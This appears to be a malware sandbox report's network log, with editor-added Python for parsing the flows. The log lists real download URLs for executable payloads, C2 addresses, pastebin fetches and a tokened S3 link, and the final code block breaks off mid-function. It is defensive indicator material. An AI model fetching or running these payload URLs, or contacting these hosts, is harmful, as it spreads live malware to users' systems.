• 52.216.137.116:443 | https://bbuseruploads.s3.amazonaws.com/c238a61a-be46-44a2-84f2-dcbe608a006a/downloads/0c322e92-7ded-485f-8f7e-dcd768dac239/FlexPremises.exe?response-content-disposition=attachment%3B%20filename%3D%22FlexPremises.exe%22&AWSAccessKeyId=ASIA6KOSE3BNO4RKJTEI&Signature=fP4AUrYtuepo7A%2FvRAOkJQsOtrI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEOf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIDvhb6af67Krb7onSxljk0Aqra6ZXY41NU7th6kbhYRSAiEAmDF2SaO3kfBTtVPdXCHBPAq5lTpehQGYTB0J4l%2BA1xsqpwIIUBAAGgw5ODQ1MjUxMDExNDYiDFv9xPFrxdM19ack8yqEAhFcojSQlOF%2FVJvzcxdJBT7ZCnvBG9GNIq3q59d%2FB3xm5oyAnYumlVJ%2BOQHKR49A1ycXhIQBwCz52pGycgJ7p66AD9657Zj67Uz%2F6%2F9ZsqN%2B1hZdZUbSxQBuuJ7smHL0yswNqQfdCEQSwTMACfjmMtN1KE8%2Fo6IDu5D025IaIGF1basMzaL5xVWKk%2B%2FBl9IEeCLnwxIYxToHn7AMMhrrkblHwXlWwPbizegLza%2Fd4fla6TybOoTYPsvM5sHcePV%2Fu3Bc20oOYQQMnlinO6r18KOLi5ml4rZhhHiIQ3scew%2FHwbSJQJxS97n2Ert%2FUabD6vZSrug9Vz%2Fyr939%2B7JOksKXnw4WMKLh%2F7EGOp0BVIiB57FBNYWmI79hCIqoFho13KaTQm1SrlHd75jbvQY674dZYOj4%2BseJH0Bht3MvbcdE9W4ArD06tLMX8ttWLr5x4zfNzVJBexdZFqvHbO6tKkF8hWHbdb91QPThvlpnmfJhIHRLwfza6BvjDwVVZXbvXAjvuHhUoeGshdv8tTE6U5uD7zZP8M8dFbI%2FqVJveNoiSqAqGw5lfMDI0Q%3D%3D&Expires=1715468202 | tls, http | redline1.exe | 26.3kB | 876.5kB | 485 | 640
    HTTP Request: GET https://bbuseruploads.s3.amazonaws.com/c238a61a-be46-44a2-84f2-dcbe608a006a/downloads/0c322e92-7ded-485f-8f7e-dcd768dac239/FlexPremises.exe?response-content-disposition=attachment%3B%20filename%3D%22FlexPremises.exe%22&AWSAccessKeyId=ASIA6KOSE3BNO4RKJTEI&Signature=fP4AUrYtuepo7A%2FvRAOkJQsOtrI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEOf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIDvhb6af67Krb7onSxljk0Aqra6ZXY41NU7th6kbhYRSAiEAmDF2SaO3kfBTtVPdXCHBPAq5lTpehQGYTB0J4l%2BA1xsqpwIIUBAAGgw5ODQ1MjUxMDExNDYiDFv9xPFrxdM19ack8yqEAhFcojSQlOF%2FVJvzcxdJBT7ZCnvBG9GNIq3q59d%2FB3xm5oyAnYumlVJ%2BOQHKR49A1ycXhIQBwCz52pGycgJ7p66AD9657Zj67Uz%2F6%2F9ZsqN%2B1hZdZUbSxQBuuJ7smHL0yswNqQfdCEQSwTMACfjmMtN1KE8%2Fo6IDu5D025IaIGF1basMzaL5xVWKk%2B%2FBl9IEeCLnwxIYxToHn7AMMhrrkblHwXlWwPbizegLza%2Fd4fla6TybOoTYPsvM5sHcePV%2Fu3Bc20oOYQQMnlinO6r18KOLi5ml4rZhhHiIQ3scew%2FHwbSJQJxS97n2Ert%2FUabD6vZSrug9Vz%2Fyr939%2B7JOksKXnw4WMKLh%2F7EGOp0BVIiB57FBNYWmI79hCIqoFho13KaTQm1SrlHd75jbvQY674dZYOj4%2BseJH0Bht3MvbcdE9W4ArD06tLMX8ttWLr5x4zfNzVJBexdZFqvHbO6tKkF8hWHbdb91QPThvlpnmfJhIHRLwfza6BvjDwVVZXbvXAjvuHhUoeGshdv8tTE6U5uD7zZP8M8dFbI%2FqVJveNoiSqAqGw5lfMDI0Q%3D%3D&Expires=1715468202

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 104.21.48.123:443
                                                                                                                                                                                                                                                                  appetitesallooonsj.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 104.21.3.125:443
                                                                                                                                                                                                                                                                  minorittyeffeoos.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.4kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  11
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                • 104.21.92.157:443
                                                                                                                                                                                                                                                                  prideconstituiiosjk.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 104.68.92.92:443
                                                                                                                                                                                                                                                                  steamcommunity.com
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  2.3kB
                                                                                                                                                                                                                                                                  42.7kB
                                                                                                                                                                                                                                                                  39
                                                                                                                                                                                                                                                                  36
                                                                                                                                                                                                                                                                • 65.109.242.112:443
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  2.7kB
                                                                                                                                                                                                                                                                  11
                                                                                                                                                                                                                                                                  8

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://65.109.242.112/

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 65.109.242.112:443
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  1.4kB
                                                                                                                                                                                                                                                                  622 B
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                  6

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST https://65.109.242.112/

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 65.109.242.112:443
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  1.5kB
                                                                                                                                                                                                                                                                  2.2kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  8

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST https://65.109.242.112/

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
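The flow records on this page are printed one field per line: a bulleted destination, an optional host or URL line, an optional protocol line, the process, two byte counters, two packet counters and then any HTTP request/response pairs. The Python below is an added example, not part of the sandbox report or its tooling. It parses records in that layout into structured rows, flags TLS sessions to a bare IP address (nothing to reputation-check, as with Aviation.pif talking to 65.109.242.112), and reads the expiry and credential type out of an S3 presigned URL like the one redline1.exe fetched FlexPremises.exe from. The sample records are constructed from three rows above; the decimal reading of kB, the protocol vocabulary and the raw-TCP handling for the 77.221.151.47:8080 rows are assumptions about the report format.

```python
from __future__ import annotations
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from ipaddress import ip_address
from urllib.parse import parse_qs, urlsplit

# Constructed sample: three records re-typed from the flow list above in the report's field order.
SAMPLE_FLOWS = """\
• 104.21.48.123:443
appetitesallooonsj.shop
tls
RegAsm.exe
1.1kB
6.9kB
10
9
• 77.221.151.47:8080
PiercingNetLink.exe
353 B
268 B
5
5
• 65.109.242.112:443
https://65.109.242.112/
tls, http
Aviation.pif
1.4kB
622 B
9
6
HTTP Request
POST https://65.109.242.112/
HTTP Response
200
"""

_SIZE_RE = re.compile(r"^(\d+(?:\.\d+)?)\s*([kMG]?)B$")
_UNITS = {"": 1, "k": 10**3, "M": 10**6, "G": 10**9}          # assumed: report uses decimal units
_KNOWN_PROTOS = {"tls", "http", "dns", "tcp", "udp", "smtp"}  # assumed protocol vocabulary
_HTTP_RE = re.compile(r"HTTP Request\s+(\S+) (\S+)(?:\s+HTTP Response\s+(\d+))?")

@dataclass
class Flow:
    dest: str                           # "ip:port" from the bullet line
    host: str | None                    # domain or URL; None for raw TCP flows
    protos: list[str]
    process: str
    sent: int                           # bytes
    received: int
    http: list[tuple[str, str, str]]    # (method, url, status) pairs

def parse_size(text: str) -> int:
    num, unit = _SIZE_RE.match(text.strip()).groups()   # AttributeError on an unknown size format
    return int(round(float(num) * _UNITS[unit]))

def _build(record: list[str]) -> Flow:
    dest = record[0].lstrip("•").strip()
    body = [ln for ln in record[1:] if ln]
    cut = body.index("HTTP Request") if "HTTP Request" in body else len(body)
    head, tail = body[:cut], body[cut:]
    host, protos = None, []             # head[-5:] = process, sent, received, pkts sent, pkts received
    for item in head[:-5]:              # 0..2 leading lines: host and/or protocols
        tokens = [t.strip() for t in item.split(",")]
        if all(t in _KNOWN_PROTOS for t in tokens):
            protos = tokens
        else:
            host = item
    return Flow(dest, host, protos, head[-5], parse_size(head[-4]), parse_size(head[-3]),
                _HTTP_RE.findall("\n".join(tail)))

def parse_flows(text: str) -> list[Flow]:
    records: list[list[str]] = []
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("•"):
            records.append([line])
        elif records:
            records[-1].append(line)
    return [_build(r) for r in records]

def direct_ip_tls(flows: list[Flow]) -> list[Flow]:
    """TLS to a bare IP address: no hostname to reputation-check, typical of stealer C2."""
    hits = []
    for f in flows:
        name = urlsplit(f.host).hostname if f.host and "://" in f.host else f.host
        try:                            # ip_address() raises ValueError for domains and for None
            if "tls" in f.protos and ip_address(name or "") is not None:
                hits.append(f)
        except ValueError:
            pass
    return hits

def presigned_url_info(url: str) -> dict[str, object]:
    """Expiry and credential type of a query-string (SigV2) presigned S3 URL."""
    q = parse_qs(urlsplit(url).query)
    key_id = q.get("AWSAccessKeyId", [""])[0]
    return {"temporary_creds": key_id.startswith("ASIA"),   # ASIA = STS temporary, AKIA = long-term
            "has_session_token": "x-amz-security-token" in q,
            "expires_utc": datetime.fromtimestamp(int(q["Expires"][0]), timezone.utc).isoformat()}
```

Run against the first row's URL, `presigned_url_info` reports a temporary (ASIA-prefixed) key with a session token and an expiry of 2024-05-11T22:56:42+00:00, about eighteen minutes after the submission time in the header if that time is UTC: the download link was minted shortly before the sample ran. `direct_ip_tls` returns only the Aviation.pif flows to 65.109.242.112; the RegAsm.exe flows have hostnames and the PiercingNetLink.exe flows carry no TLS.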
                                                                                                                                                                                                                                                                • 65.109.242.112:443
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  1.6kB
                                                                                                                                                                                                                                                                  6.3kB
                                                                                                                                                                                                                                                                  12
                                                                                                                                                                                                                                                                  9

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST https://65.109.242.112/

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 65.109.242.112:443
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  1.4kB
                                                                                                                                                                                                                                                                  632 B
                                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                                  5

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST https://65.109.242.112/

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  399 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:9090
                                                                                                                                                                                                                                                                  GameSyncLinks.exe
                                                                                                                                                                                                                                                                  2.3kB
                                                                                                                                                                                                                                                                  308 B
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                • 127.0.0.1:14343
                                                                                                                                                                                                                                                                  GameSyncLinks.exe
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 104.20.3.235:443
                                                                                                                                                                                                                                                                  https://pastebin.com/raw/E0rY26ni
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  724 B
                                                                                                                                                                                                                                                                  6.1kB
                                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                                  9

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://pastebin.com/raw/E0rY26ni

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 172.67.169.89:443
                                                                                                                                                                                                                                                                  https://yip.su/RNWPd.exe
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  939 B
                                                                                                                                                                                                                                                                  14.3kB
                                                                                                                                                                                                                                                                  13
                                                                                                                                                                                                                                                                  20

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://yip.su/RNWPd.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 185.172.128.59:80
                                                                                                                                                                                                                                                                  http://185.172.128.59/ISetup5.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  12.1kB
                                                                                                                                                                                                                                                                  408.4kB
                                                                                                                                                                                                                                                                  237
                                                                                                                                                                                                                                                                  308

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.59/ISetup5.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 5.42.96.64:80
                                                                                                                                                                                                                                                                  http://5.42.96.64/server/ww12/AppGate2103v01.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  28.5kB
                                                                                                                                                                                                                                                                  1.5MB
                                                                                                                                                                                                                                                                  599
                                                                                                                                                                                                                                                                  1071

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.64/server/ww12/AppGate2103v01.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 5.42.96.78:80
                                                                                                                                                                                                                                                                  http://5.42.96.78/files/setup.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  118.5kB
                                                                                                                                                                                                                                                                  6.7MB
                                                                                                                                                                                                                                                                  2542
4839
HTTP Request: GET http://5.42.96.78/files/setup.exe
HTTP Response: 200

• 172.67.182.192:443
  https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe
  tls, http
  CasPol.exe
  756 B
  6.1kB
  8
  9
  HTTP Request: GET https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe
  HTTP Response: 307

• 104.21.90.14:443
  https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe
  tls, http
  CasPol.exe
  752 B
  6.1kB
  8
  9
  HTTP Request: GET https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe
  HTTP Response: 307

• 172.67.182.192:443
  https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe
  tls, http
  CasPol.exe
  756 B
  6.1kB
  8
  9
  HTTP Request: GET https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe
  HTTP Response: 307

• 5.42.96.78:80
  http://5.42.96.78/files/setup.exe
  http
  CasPol.exe
  126.6kB
  6.7MB
  2663
  4851
  HTTP Request: GET http://5.42.96.78/files/setup.exe
  HTTP Response: 200

• 185.18.245.58:80
  http://1xst.ru/tech/upd2.php
  http
  CasPol.exe
  300 B
  132 B
  5
  3
  HTTP Request: GET http://1xst.ru/tech/upd2.php

• 104.21.90.14:443
  https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe
  tls, http
  CasPol.exe
  752 B
  6.1kB
  8
  9
  HTTP Request: GET https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe
  HTTP Response: 307

• 104.21.31.124:443
  https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
  tls, http
  CasPol.exe
  112.8kB
  4.5MB
  2093
  3220
  HTTP Request: GET https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
  HTTP Response: 200

• 104.21.31.124:443
  https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
  tls, http
  CasPol.exe
  116.9kB
  4.5MB
  2130
  3225
  HTTP Request: GET https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
  HTTP Response: 200

• 104.21.60.76:443
  https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
  tls, http
  CasPol.exe
  114.4kB
  4.5MB
  2133
  3231
  HTTP Request: GET https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
  HTTP Response: 200

• 104.21.60.76:443
  https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
  tls, http
  CasPol.exe
  115.4kB
  4.5MB
  2137
  3219
  HTTP Request: GET https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
  HTTP Response: 200

• 185.18.245.58:80
  http://1xst.ru/tech/upd2.php
  http
  CasPol.exe
  352 B
  132 B
  6
  3
  HTTP Request

                                                                                                                                                                                                                                                                  GET http://1xst.ru/tech/upd2.php
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 5.42.66.10:80
                                                                                                                                                                                                                                                                  http://5.42.66.10/api/bing_release.php
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  YPvckKCypmBOW0NpRBKcRmjU.exe
                                                                                                                                                                                                                                                                  481 B
                                                                                                                                                                                                                                                                  433 B
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  4

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.66.10/api/bing_release.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 104.26.9.59:443
                                                                                                                                                                                                                                                                  api.myip.com
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  YPvckKCypmBOW0NpRBKcRmjU.exe
                                                                                                                                                                                                                                                                  913 B
                                                                                                                                                                                                                                                                  6.3kB
                                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 34.117.186.192:443
                                                                                                                                                                                                                                                                  ipinfo.io
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  YPvckKCypmBOW0NpRBKcRmjU.exe
                                                                                                                                                                                                                                                                  962 B
                                                                                                                                                                                                                                                                  5.6kB
                                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 185.172.128.90:80
                                                                                                                                                                                                                                                                  http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                                                                                                                                                                                                                                  435 B
                                                                                                                                                                                                                                                                  357 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  4

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  500
                                                                                                                                                                                                                                                                • 185.172.128.228:80
                                                                                                                                                                                                                                                                  http://185.172.128.228/ping.php?substr=five
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                                                                                                                                                                                                                                  375 B
                                                                                                                                                                                                                                                                  279 B
                                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                                  3

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.228/ping.php?substr=five

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 185.172.128.59:80
                                                                                                                                                                                                                                                                  http://185.172.128.59/syncUpd.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                                                                                                                                                                                                                                  4.8kB
                                                                                                                                                                                                                                                                  259.0kB
                                                                                                                                                                                                                                                                  101
                                                                                                                                                                                                                                                                  196

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.59/syncUpd.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 185.172.128.228:80
                                                                                                                                                                                                                                                                  http://185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                                                                                                                                                                                                                                  100.3kB
                                                                                                                                                                                                                                                                  5.0MB
                                                                                                                                                                                                                                                                  2104
                                                                                                                                                                                                                                                                  3746

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.228/BroomSetup.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 20.157.87.45:80
                                                                                                                                                                                                                                                                  http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  u2rs.1.exe
                                                                                                                                                                                                                                                                  836 B
                                                                                                                                                                                                                                                                  721 B
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  6

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashx

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
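Rows like the ones in this network table are the raw material for triage: which connections are IP-geolocation checks, which are payload downloads from bare-IP hosts, which process should never talk to the network at all, and which POST looks like an upload of collected data. The following is an added example written by the editor, not code from the sandbox or from any project on this page. The sample rows are transcribed from this table (packet counts dropped, HTTP method added as a column); the host lists, the "16 hex characters + .php" gate pattern and the 100 kB upload threshold are the editor's heuristics and should be tuned per environment.

```python
"""Parse flattened sandbox network rows into structured flows, tag suspicious
patterns and emit an IOC list.  Added example; heuristics are assumptions."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed sample input: rows transcribed from this report's network table.
# address | url-or-host | proto | process | sent | received | method ("-" = none)
SAMPLE_ROWS = """\
185.18.245.58:80 | http://1xst.ru/tech/upd2.php | http | CasPol.exe | 352 B | 132 B | GET
77.221.151.47:8080 | - | - | PiercingNetLink.exe | 353 B | 268 B | -
5.42.66.10:80 | http://5.42.66.10/api/bing_release.php | http | YPvckKCypmBOW0NpRBKcRmjU.exe | 481 B | 433 B | GET
104.26.9.59:443 | api.myip.com | tls | YPvckKCypmBOW0NpRBKcRmjU.exe | 913 B | 6.3kB | -
34.117.186.192:443 | ipinfo.io | tls | YPvckKCypmBOW0NpRBKcRmjU.exe | 962 B | 5.6kB | -
185.172.128.59:80 | http://185.172.128.59/syncUpd.exe | http | dH6oPXkyyyDL7hNf3xeAvCZ9.exe | 4.8kB | 259.0kB | GET
185.172.128.228:80 | http://185.172.128.228/BroomSetup.exe | http | dH6oPXkyyyDL7hNf3xeAvCZ9.exe | 100.3kB | 5.0MB | GET
20.157.87.45:80 | http://svc.iolo.com/__svc/sbv/DownloadManager.ashx | http | u2rs.1.exe | 836 B | 721 B | POST
185.172.128.150:80 | http://185.172.128.150/c698e1bc8a2f5e6d.php | http | u2rs.0.exe | 1.0MB | 5.4MB | POST
"""

_UNITS = {"B": 1, "kB": 1_000, "MB": 1_000_000, "GB": 1_000_000_000}
_SIZE_RE = re.compile(r"^\s*([\d.]+)\s*(B|kB|MB|GB)\s*$")


def parse_size(text: str) -> int:
    """'259.0kB' -> 259000, '352 B' -> 352 (the report prints decimal units)."""
    m = _SIZE_RE.match(text)
    if not m:
        raise ValueError(f"bad size: {text!r}")
    return int(round(float(m.group(1)) * _UNITS[m.group(2)]))


@dataclass
class Flow:
    ip: str
    port: int
    target: str      # URL for http rows, SNI host for tls rows, '' for raw TCP
    proto: str       # 'http', 'tls' or '' for raw TCP
    process: str
    sent: int
    received: int
    method: str      # 'GET', 'POST' or ''
    tags: list = field(default_factory=list)


def parse_rows(text: str) -> list[Flow]:
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
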